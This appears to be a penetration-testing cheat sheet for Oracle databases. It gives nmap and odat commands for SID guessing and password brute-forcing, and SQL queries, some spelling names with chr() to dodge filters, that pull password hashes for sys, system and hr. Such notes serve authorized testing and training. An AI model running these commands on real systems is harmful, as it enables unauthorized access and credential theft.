README.md

Oracle Database enumeration and exploitation

• Initial enumeration
• Brute-forcing a way in
• Connecting to an Oracle database
• Enumerating a database

Initial enumeration

nmap -vv -p 1521 -sT -A --script=+oracle* <ip>

Brute-forcing a way in

• Guessing SIDs (databases):

odat sidguesser -s <ip>

• Brute-forcing both username and password (using builtin list):

odat passwordguesser -s <ip> -d <sid> --both-ul

• Brute-forcing password for the user:

echo '<username>' > username.txt
odat passwordguesser -s <ip> -d <sid> --accounts-files $PWD/username.txt /usr/share/wordlists/rockyou.txt

Connecting to an Oracle database

• Check available commands:

odat all -s <ip> -d <sid> -U <username> -P '<password>' 
odat all -s <ip> -d <sid> -U <username> -P '<password>' --sysdba # Privileged

• Connect to a database:

sqlplus '<username>/<password>@<ip>:<port>/<sid>'
sqlplus '<username>/<password>@<ip>:<port>/<sid>' as sysdba # Privileged

• Improve formatting:

SET LINESIZE 32000;

Enumerating a database

• Get version:

SELECT banner FROM v$version;
SELECT version FROM v$instance;

• Get current database:

SELECT name from v$database; 

• Get current user:

SELECT user FROM DUAL; 

• Get current user permissions:

select * from user_role_privs;

• Get current user's password hash:

SELECT password FROM dba_users WHERE username=(SELECT user FROM DUAL);
SELECT password FROM sys.user$ WHERE name=(SELECT user FROM DUAL);

• List all users:

SELECT username FROM dba_users ORDER BY 1;
SELECT name FROM sys.user$ ORDER BY 1;

• Get default user's password hash:

SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash
SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash
SELECT password FROM dba_users WHERE lower(username)=(chr(104)||chr(114)); -- Get "hr" user's password hash
SELECT password FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash
SELECT password FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash
SELECT password FROM sys.user$ WHERE lower(name)=(chr(104)||chr(114)); -- Get "hr" user's password hash

• List tables:

SELECT owner,table_name FROM all_tables ORDER BY 1; 

• List table columns:

SELECT column_name FROM all_tab_columns WHERE table_name='<table_name>' ORDER BY 1; 

• Search for %user% like tables:

SELECT owner,table_name FROM all_tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- LIMIT/OFFSET works on 12.1+ version